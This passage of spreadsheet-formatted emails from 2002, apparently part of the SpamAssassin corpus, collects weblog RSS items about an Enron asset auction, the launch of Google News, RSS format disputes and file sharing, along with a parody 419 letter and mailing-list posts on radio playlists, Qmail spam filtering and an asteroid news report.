    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nGregor sez: \n\n    ENRON Corp material assets go on the block 7 AM CT TOMORROW, Wednesday, \n    9/25. First on the list is the giant, steel, Enron "E" (Lot "E"), followed \n    by tons of cool tech. 50 inch plasma panels, desktop LC Displays, boxes of \n    Palm PDAs or Nokia cell phones, network stuff, wireless stuff, desktop \n    computers, servers, monitors, printers, plotters, in both massive lots, and \n    individually! Oh yeah, Enron trade-show trinkets too, by the cartload. \n\n    The catch: You have to either go to Texas to pick up the stuff, or arrange \n    with an approved 3rd party vendor (list provided on the web site) to have \n    it picked, packed and shipped for you. \n\n    Go! Register! Bid! Consume!  \n\nLink[1] Discuss[2] (_Thanks, Gregor!_)\n\n[1] [URL]http://www.dovebid.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.dovebid.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Laura Bush's 419 letter</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nA new addition to the parodical genre of 419 ("Nigerian Money Laundry Scam") \nletters from members of the Shrub establishment, following up on Cheney's \nletter[1]. \n\n    I am the widow of the late President George W. Bush of the United States of \n    America. I am writing you this letter in confidence regarding my current \n    circumstances. \n\n    I escaped the United States ahead of death squads with my husband and two \n    children Jenna and Frank, moving first to England and then, when my \n    husband's political enemies took power there, to Austria. All of our \n    wealth, obtained legitimately through baseball, oil drilling and insider \n    trading, was seized by the new government of the USA under the despotic \n    regime of (Dr.) Noam Chomsky, except for the contents of a few Swiss bank \n    accounts. These bank accounts, which contain social security lock-box funds \n    and the bulk of the 2001 budget surplus, could not be accessed by me or my \n    children, due to agreements made between the socialist government of the \n    USA and Swiss bank regulators. They seized our ranch in Crawford, Texas and \n    now use it to teach homosexualist propaganda to schoolchildren.  \n\nLink[2] Discuss[3] (_Thanks, Stefan!_)\n\n[1] [URL]http://atrios.blogspot.com[/URL]\n[2] [URL]http://brainslug.org[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://atrios.blogspot.com http://brainslug.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:03:41 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:03:41 -0000</t>
  </si>
  <si>
    <t>Bond-Barbie</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nBarbie has been made over as a Bond girl:  \n\n    [IMG: [URL]http://www.craphound.com[/URL]] As James Bond, Ken \n    has matured nicely with rooted hair, with slight silvering at his temples, \n    wearing a midnight blue tuxedo, and authentic recreation of the classic tux \n    by Brioni, the famed clothier. Linda Hemming, the award winning costume \n    designer in charge of this year's James Bond film, outfits Barbie doll. She \n    wears a blood red gown with a glittering gold lace overlay and a gauzy red \n    shawl with a gold filigree design. Her gown is cut up the side to reveal \n    lots of leg as well as not so discreet hip strap that anchors Barbie's cell \n    phone. The set is slated for release in November, to coincide with the \n    premiere of "Die Another Day," the new James Bond film. Bond, James Bond, \n    meet Barbie, just Barbie...  \n\nLink[1] Discuss[2] (_Thanks Derek!_)\n\n[1] [URL]http://www.barbiebazaar.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.craphound.com http://www.barbiebazaar.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>12 Reasons to Pre-Order my Novel</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nI've put up a page called "12 Reasons to Pre-Order Down and Out in the Magic \nKingdom," with blurbs by twelve people telling you why they think you should \nbuy it. Here're the blurbers:  \n\n-  Bruce Sterling \n-  Lawrence Lessig \n-  Kelly Link \n-  Mark Frauenfelder \n-  Karl Schroeder \n-  Rudy Rucker \n-  Howard Rheingold \n-  Douglas Rushkoff \n-  Tim O'Reilly \n-  Bruce Schneier \n-  Gardner Dozois \n-  Mitch Kapor \n\nAnd the blurbs are great, like this one: \n\n    Wow! Disney imagineering meets nanotechnology, the reputation economy, and \n    Ray Kurzweil's transhuman future. As much fun as Neal Stephenson's Snow \n    Crash, and as packed with mind bending ideas about social changes cascading \n    from the frontiers of science. \n\n    Tim O'Reilly\n    Publisher and Founder, O'Reilly and Associates \n\n(_NB: This used to be 13 reasons, but I just realized that I somehow ended up \nwith a phantom entry from Dan GIllmor, who, on closer examination, it appears I \nfailed to deliver a copy to, like a total idiot. My apologies, Dan_) Link[1] \nDiscuss[2]\n\n[1] [URL]http://www.craphound.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.craphound.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: oblomovka &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:27 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:27 -0000</t>
  </si>
  <si>
    <t>oblomovka &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Google News</t>
  </si>
  <si>
    <t>URL: [URL]http://www.oblomovka.com[/URL]\nDate: 2002-09-24T05:32:00-0700\n\nThere are a few net innovations that have far greater ramifications than you \nwould, at first hearing, expect them to. Napster, at heart just IRC with a UI, \nwas one. Google News[1] is another. \n\nIn its first day, I've already noticed: \n\n- The front page changes its editorial stance depending on where the earth's \nterminator[2] is. So in the evening on the West Coast, Google News is lead by \nthe South China Morning Post, and various Asian english-language papers. By the \nlate evening, the BBC and European papers are kicking in. \n- The site may be created by algorithms - but what about the choice of sites? \nThe most arbitrary dividing line I see in Google's coverage is what is a news \nsite, and what isn't. Slashdot[3] is, for instance, as well as some very \nobscure[4] newspapers. What about Blues News[5] or Scripting News[6], though? \n- Big companies spend mucho money paying "clipping services" that send them \ncopies of any press coverage they receive. Clipping services are going to have \nto find some added value, very[7] very[8] quickly. \n\n[1] [URL]http://news.google.com[/URL]\n[2] [URL]http://www.concentric.net[/URL]\n    The\nsunrise-sunset line dividing the day and night halves of the Moon or a\nplanet.\n[3] [URL]http://www.slashdot.org[/URL]\n[4] [URL]http://www.eveningnews24.co.uk[/URL]\n[5] [URL]http://www.bluesnews.com[/URL]\n[6] [URL]http://www.scripting.com[/URL]\n[7] [URL]http://news.google.com[/URL]\n[8] [URL]http://news.google.com[/URL]</t>
  </si>
  <si>
    <t>http://www.oblomovka.com http://news.google.com http://www.concentric.net http://www.slashdot.org http://www.eveningnews24.co.uk http://www.bluesnews.com http://www.scripting.com http://news.google.com http://news.google.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:24 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:24 -0000</t>
  </si>
  <si>
    <t>scripting &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Iowa: "There was frost outside this morning!"</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 15:21:06 GMT\n\nIowa[1]: "There was frost outside this morning!"\n\n[1] [URL]http://iowa.weblogger.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://iowa.weblogger.com</t>
  </si>
  <si>
    <t>9/2/00: "In the overworked world of Web development, there's no</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 14:38:08 GMT\n\n9/2/00[1]: "In the overworked world of Web development, there's no time to \nstudy, there's only time to do."\n\n[1] [URL]http://davenet.userland.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://davenet.userland.com</t>
  </si>
  <si>
    <t>Wired: "An urgent business proposition and requests for urgent</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 11:10:18 GMT\n\nWired[1]: "An urgent business proposition and requests for urgent assistance \nfrom a so-called Nigerian official were heeded by a Detroit bank secretary in \nthe latest example of how the ubiquitous e-mail scam actually works."\n\n[1] [URL]http://www.wired.com[/URL],1367,55329,00.html</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.wired.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:23 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:23 -0000</t>
  </si>
  <si>
    <t>Lest anyone doubt that Brent has a good heart. "I laughed,</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 16:13:33 GMT\n\nLest anyone doubt that Brent[1] has a good heart. "I laughed, because here's \nthe irony -- on this site, on my own personal weblog, Radio UserLand rather \nthan NetNewsWire is the most-used aggregator."\n\n[1] [URL]http://inessential.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://inessential.com</t>
  </si>
  <si>
    <t>Aaron Swartz: "If everyone is afraid to speak, who will defend</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 15:35:25 GMT\n\nAaron Swartz[1]: "If everyone is afraid to speak, who will defend our right to \ndownload?" _I'm not afraid._\n\n[1] [URL]http://www.aaronsw.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.aaronsw.com</t>
  </si>
  <si>
    <t>Lance Knobel of Davos Newbies does a quick review of Tony Blair's</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 11:19:42 GMT\n\nLance Knobel[1] of Davos Newbies does a quick review of Tony Blair's case \nagainst Sadam Hussein.\n\n[1] [URL]http://www.davosnewbies.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.davosnewbies.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:22 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:22 -0000</t>
  </si>
  <si>
    <t>NY Times: "Google's automated editors appeared to match the work</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 15:05:13 GMT\n\nNY Times[1]: "Google's automated editors appeared to match the work of human \ncompetitors."\n\n[1] [URL]http://www.nytimes.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.nytimes.com</t>
  </si>
  <si>
    <t>Looks like Google did a deal to index the NY Times. If you do</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 15:53:42 GMT\n\nLooks like Google did a deal to index the NY Times. If you do this news search\n[1], and mouse over the link, you'll see there's a partner attribute on the \nURL, like the ones in our links[2]. What are the implications of this? Here's \none. Martin Nisenholtz may now have a _chance_ of winning his bet[3] with me. \n";-&gt;"\n\n[1] [URL]http://news.google.com[/URL]\n[2] [URL]http://www.nytimes.com[/URL]\n[3] [URL]http://www.google.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://news.google.com http://www.nytimes.com http://www.google.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:21 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:21 -0000</t>
  </si>
  <si>
    <t>Jeremy Allaire: Wholistic Web Services.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 18:27:17 GMT\n\nJeremy Allaire: Wholistic Web Services[1].\n\n[1] [URL]http://radio.weblogs.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://radio.weblogs.com</t>
  </si>
  <si>
    <t>News.Com: "Linux is a serious competitor," said Ballmer.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 18:41:50 GMT\n\nNews.Com[1]: "Linux is a serious competitor," said Ballmer.\n\n[1] [URL]http://rss.com.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://rss.com.com</t>
  </si>
  <si>
    <t>Scoble: "I'm just not that excited by much that Microsoft is doing."</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 18:46:59 GMT\n\nScoble[1]: "I'm just not that excited by much that Microsoft is doing."\n\n[1] [URL]http://radio.weblogs.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:20 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:20 -0000</t>
  </si>
  <si>
    <t>MacNet Journal reports that OmniOutliner will support OPML soon.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 17:02:01 GMT\n\nMacNet Journal reports[1] that OmniOutliner will support OPML[2] soon. That's \nvery good news[3] indeed. \n\n[1] [URL]http://www.whiterabbits.com[/URL]\n[2] [URL]http://www.opml.org[/URL]\n[3] [URL]http://www.omnigroup.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.whiterabbits.com http://www.opml.org http://www.omnigroup.com</t>
  </si>
  <si>
    <t>Ray Ozzie: Software Platform Dynamics.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 17:21:41 GMT\n\nRay Ozzie: Software Platform Dynamics[1].\n\n[1] [URL]http://www.ozzie.net[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.ozzie.net</t>
  </si>
  <si>
    <t>Dotcom Scoop: "CNET's Download.com is set to introduce a new</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 00:47:50 GMT\n\nDotcom Scoop[1]: "CNET's Download.com is set to introduce a new program for its \nDownload.com software portal. Beginning Sept. 30, software vendors will be \ncharged a fee to upload their wares. There is also a monthly-package to get \nbetter placement on the site."\n\n[1] [URL]http://www.dotcomscoop.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.dotcomscoop.com</t>
  </si>
  <si>
    <t>Note to self: Read the pingback spec. Form opinion.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 03:14:24 GMT\n\nNote to self: Read the pingback spec[1]. Form opinion.\n\n[1] [URL]http://www.hixie.ch[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.hixie.ch</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:19 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:19 -0000</t>
  </si>
  <si>
    <t>Sam Ruby: "Yup, I'm a sick puppy." _Me too!_</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Wed, 25 Sep 2002 03:07:06 GMT\n\nSam Ruby[1]: "Yup, I'm a sick puppy." _Me too!_\n\n[1] [URL]http://www.intertwingly.net[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.intertwingly.net</t>
  </si>
  <si>
    <t>Bruce Loebrich has scraped RSS feeds for Google news, and a RSS</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 22:59:56 GMT\n\nBruce Loebrich[1] has scraped RSS feeds for Google news, and a RSS 2.0 success \nstory. In other words, it's okay to use the features in 2.0. We're doing it at \nUserLand and so is Bruce.\n\n[1] [URL]http://radio.weblogs.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:16 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:16 -0000</t>
  </si>
  <si>
    <t>aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Rights Fight</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-09-24T11:03:09-06:00\n\nI need a lawyer willing to argue that not-for-profit file sharing is fair use. \nI've got a plan. \n\nNapster: Work in Progress[1] -- that's new. They're also selling merchandise. \n\nMP3 Is Not a Crime[2] is a weblog covering the attacks on our rights. \n\nDave Winer says he's not afraid to defend our rights[3]. _Yes! Who else?_ \n\nI will now refer to file sharing networks as "fair use networks"\nlike my limewire fair use network client.. or the kazaa fair use network..\n\n\n\n[1] [URL]http://www.napster.com[/URL]\n[2] [URL]http://www.mp3isnotacrime.org[/URL]\n[3] [URL]http://scriptingnews.userland.com[/URL]</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://www.napster.com http://www.mp3isnotacrime.org http://scriptingnews.userland.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:14 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:14 -0000</t>
  </si>
  <si>
    <t>diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>DVD stills</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-24T13:49:41-05:00\n\nDVD Capture 1.0[1] &amp;#8220;is a helper application for the Apple DVD Player. It \nenables the user to take screen captures of the DVD Player Viewer in window and \nfull screen mode. The captures can be saved to a file or placed on the \nclipboard.&amp;#8221;\n\n\n\n[1] [URL]http://www.versiontracker.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.versiontracker.com</t>
  </si>
  <si>
    <t>Parallels</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-24T20:38:57-05:00\n\n_Jeffrey Zeldman_: OS X Blues update[1]. \n\n    A couple of intellectuals have pointed out parallels between the rigidity \n    of OS X, which derives its power from Unix and XML, and the rules of \n    standards-based web development, which also compels you to do things the \n    right way instead of using five different non-standard hacks. The parallel \n    is not without merit. Building web pages the right way is hard at first, \n    but once you get it, you never want to go back. Regardless, we miss OS 9's \n    flexibility and ease of use, and a metric ton of logic doesn't offset that \n    feeling of loss. \n\n\n\n\n\n[1] [URL]http://www.zeldman.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.zeldman.com</t>
  </si>
  <si>
    <t>Light reading</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-24T10:46:15-05:00\n\n- _Phil Ringnalda_: Putting on the brakes[1]. &amp;#8220;So, the answer to the \nquestion that started this whole project, "what is the RDF in RSS 1.0 good \nfor?" is two things: it's good for someone who has an infinitely large database \nthat can be queried infinitely fast by a schema-aware program, or it's good for \nwriting a schema-aware aggregator that can try to figure out what it should do \nwith new elements that it hasn't seen before. That's actually an interesting \nproject with some potential for success, but at this point I'm sick of the \nwhole thing, so I'll leave that project for someone else.&amp;#8221; \n- _Aaron Swartz_: TRAMP: Makes RDF look like Python data structures[2]. \n&amp;#8220;RDF/XML got you down? Tired of having to go through contortions to deal \nwith data? Want to write Python and be standards-compatible at the same time? \nNeed a module to implement the psuedo-code you had on your slides? TRAMP may or \nmay not be the answer to these problems!&amp;#8221; Complete with an example of \nparsing FOAF files. \n- _Dan Connolly_: HyperRDF: Using XHTML Authoring Tools with XSLT to produce \nRDF schemas[3]. &amp;#8220;XML syntax is a little tedious, but lots of people are \nevidently willing and able of editing it by hand. RDF adds another layer of \ntedium, but there are still a few folks willing to write it by hand. I make \nheavy use of reification/quoting in my representation of logical formulas in \nRDF. This adds another layer of tedium that I find unmanageable, and I have \nbeen writing XML/SGML/HTML by hand for 10 years.&amp;#8221; Also includes a cogent \nexplanation of the obscure profile attribute in HTML. \n\n\n\n\n\n[1] [URL]http://philringnalda.com[/URL]\n[2] [URL]http://www.aaronsw.com[/URL]\n[3] [URL]http://www.w3.org[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://philringnalda.com http://www.aaronsw.com http://www.w3.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:00:13 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:00:13 -0000</t>
  </si>
  <si>
    <t>RSS revolt</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-25T00:38:31-05:00\n\n_Anil Dash_: XML version 1.0[1]. &amp;#8220;Why isn't there a way to syndicate my \nwords without butchering the way they look?&amp;#8221; Several people protested \nlast week by changing their weblog templates to something like this[2]. Jason \nLevine has more links[3] to those involved. I spoke with one of the people who \nimplemented it, and she claims it wasn't a protest as such, more of an inside \njoke. Point taken: the entire point of an aggregator (and syndication in \ngeneral) is to make everyone's words look the same. Counterpoint: the default \nin most weblog systems is to only publish excerpts in RSS feeds; nobody's \nforcing you to publish full posts. This would probably be a good place to \ninsert a Zen quote about attachment, but my mind is too fuzzy to find it. \n\n_Timothy Appnel_: More FFKAR, RDF, and FOAF[4]. FFKAR is &amp;#8220;the format \nformerly known as RSS&amp;#8221;. Sam has already implemented it[5]. \n\n_Nicholas Avenell_: ESF[6]. &amp;#8220;Are you also fed up with the continuing war \nbetween RSS 0.9* and 1.0 and 2.0 and whatever else they invent today? Me too. \nSo today I invented the Epistula Syndication Format. ESF. It isn't XML. It \nisn't RDF. It's just data.&amp;#8221; Sam[7] would love it, then. But Movable Type \ndoesn't support outputting dates in Unix timestamp format[8], which could be an \nimpediment to mainstream acceptance. \n\n_Shelley Powers_: Consumer Rights and RSS[9]. &amp;#8220;I'm not buying into RSS \n0.9x. I'm not buying into RSS 2.0. I'm not buying into RSS 1.0. I changed my \nRSS 0.91 and RSS 1.0 templates to read the following:&amp;#8221; \n\n    *RSS not supported here* \n\n    This weblog does not support RSS 0.9x, RSS 2.0, or RSS 1.0. If you wish to \n    view entries, may I suggest that you visit the weblog, and save your fast \n    skimming for the New York Times and Wall Street Journal. \n\nI'm sure this is some sort of DMCA violation or something, but here goes: \n\n    import urllib, re; print "\n TITLE: Burningbird\n\n    \n [URL]http://weblog.burningbird.net[/URL]\n en-us\n \n" + "\n".join(["TITLE: %s\n\n    %s" % t for t in re.compile(r'dc:title="(.*?)"\s*dc:identifier="(.*?)"', \n    re.DOTALL).findall(urllib.urlopen('[URL]http://weblog.burningbird.net[/URL]').read())]) \n    + "" \n\n\n\n\n\n[1] [URL]http://www.dashes.com[/URL]\n[2] [URL]http://www.dashes.com[/URL]\n[3] [URL]http://q.queso.com[/URL]\n[4] [URL]http://www.mplode.com[/URL]\n[5] [URL]http://www.intertwingly.net[/URL]\n[6] [URL]http://www.aquarionics.com[/URL]\n[7] [URL]http://www.intertwingly.net[/URL]\n[8] [URL]http://www.movabletype.org[/URL] tag formats\n[9] [URL]http://weblog.burningbird.net[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://weblog.burningbird.net http://weblog.burningbird.net http://www.dashes.com http://www.dashes.com http://q.queso.com http://www.mplode.com http://www.intertwingly.net http://www.aquarionics.com http://www.intertwingly.net http://www.movabletype.org http://weblog.burningbird.net</t>
  </si>
  <si>
    <t>Stark raving sane</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-24T22:05:32-05:00\n\n_Sam Ruby_: Stark raving mad[1]. \n\n    This post was entered in Radio, extracted using a batch file via some \n    UserTalk, parsed using Perl, cleaned up by tidy and a C program of my own \n    design, transferred to intertwingly using scp, and then ssh triggers \n    unpacking on the destination site, where a shell script takes over: invokes \n    indexing using Jakarta's Lucene, and then a python script pings weblogs.com \n    and blo.gs. \n\nTom Stoppard (_Rosencrantz and Guildenstern are Dead_): \n\n    Guildenstern: &amp;#8220;A man talking sense to himself is no madder than a man \n    talking nonsense not to himself.&amp;#8221;\n    Rosencrantz: &amp;#8220;Or just as mad.&amp;#8221;\n    Guildenstern: &amp;#8220;Or just as mad.&amp;#8221;\n    Rosencrantz: &amp;#8220;And he does both.&amp;#8221;\n    Guildenstern: &amp;#8220;So there you are.&amp;#8221;\n    Rosencrantz: &amp;#8220;Stark raving sane.&amp;#8221; \n\n\n\n\n\n[1] [URL]http://www.intertwingly.net[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.intertwingly.net</t>
  </si>
  <si>
    <t>To: Fork@xent.com\nFrom: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nDate: Wed, 25 Sep 2002 01:19:59 -0700</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 01:19:59 -0700</t>
  </si>
  <si>
    <t>Fork@xent.com</t>
  </si>
  <si>
    <t>Digital radio playlists are prohibited?!</t>
  </si>
  <si>
    <t>Anyone heard of this law before?\n\n&gt; Q. Can I get a playlist?\n&gt; A. We are unable to offer a playlist. The Digital Performance Right in \n&gt; Sound Recordings Act of 1995 passed by Congress prevents us from \n&gt; disclosing such information. The Digital Law states that if one is \n&gt; transmitting a digital signal, song information cannot be \n&gt; pre-announced. It is a Music Choice policy not to release a playlist of \n&gt; upcoming or previously played songs.\n\nRecently, MusicChoice upgraded their website with a very important \nservice, as far as I'm concerned: real-time song info from their \nwebsite. My DirecTV receiver is up on a shelf (and its display scrolls \nintermittently); and I'm surely not going to fire up my projector while \nlistening to the "radio", so I'm quite happy that I can retrieve r/t \nsong info with URLs like:\n\n[URL]http://backstage.musicchoice.com[/URL]\n[URL]http://backstage.musicchoice.com[/URL]\n[URL]http://backstage.musicchoice.com[/URL]\netc...\n\nNow, if I were a more eager hacker, I'd write up little WSDL stubs for \nthese event streams (they're clearly not worried about load, since their \nown web pages specify 15 sec meta-refresh) and then feed 'em through a \ncontent router to alert me to cool songs. Heck, cross-reference the \nservice to CDDB and... :-)\n\nRK</t>
  </si>
  <si>
    <t>http://backstage.musicchoice.com http://backstage.musicchoice.com http://backstage.musicchoice.com</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "zenn" &lt;zenn@optushome.com.au&gt;\nDate: Wed, 24 Jul 2002 22:47:49 +1000</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 22:47:49 +1000</t>
  </si>
  <si>
    <t>"zenn" &lt;zenn@optushome.com.au&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Sitewide Spam Filtering with Qmail ??</t>
  </si>
  <si>
    <t>Hi all...\n\nI'm new to SpamAssasin so I appologies if the question has been asked\nbefore.\nI'm thinking of setting up SA with my Qmail(Maildir) server acting as our\ngateway.\nIt currently provides inline virus scanning and ORDB open relay filtering.\nIs it possible to setup SA to act as a sitewide Spam filter ?\nIs there any documentation on setting this up ?\nThe Qmail server does not house any local mail accounts, it acts as a pure\nrelay for our internal mail server, I am currently relaing mail for 8\ninternal domains...\n\nSuggestions would be appreciated.\n\nRegards\nZenn\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Peter Kilby" &lt;peterkilby@dsl.pipex.com&gt;\nDate: Wed, 24 Jul 2002 22:34:07 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 22:34:07 +0100</t>
  </si>
  <si>
    <t>"Peter Kilby" &lt;peterkilby@dsl.pipex.com&gt;</t>
  </si>
  <si>
    <t>Asteroids anyone ?</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_000F_01C23362.3939B510 Content-Type: multipart/alternative; 	boundary="----=_NextPart_001_0010_01C23362.3939B510" ------=_NextPart_001_0010_01C23362.3939B510 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Not the computer game but ....... [URL]http://news.bbc.co.uk[/URL] Wednesday, 24 July, 2002, 02:29 GMT 03:29 UK=20 Space rock 'on collision course' =20 An asteroid could devastate Earth      =20      =20       By Dr David Whitehouse=20       BBC News Online science editor =20     =20     =20 An asteroid discovered just weeks ago has become the most threatening = object yet detected in space.=20 A preliminary orbit suggests that 2002 NT7 is on an impact course with = Earth and could strike the planet on 1 February, 2019 - although the = uncertainties are large.=20 Astronomers have given the object a rating on the so-called Palermo = technical scale of threat of 0.06, making NT7 the first object to be = given a positive value.=20 &gt;&gt;From its brightness, astronomers estimate it is about two kilometres = wide, large enough to cause continent-wide devastation on Earth.=20 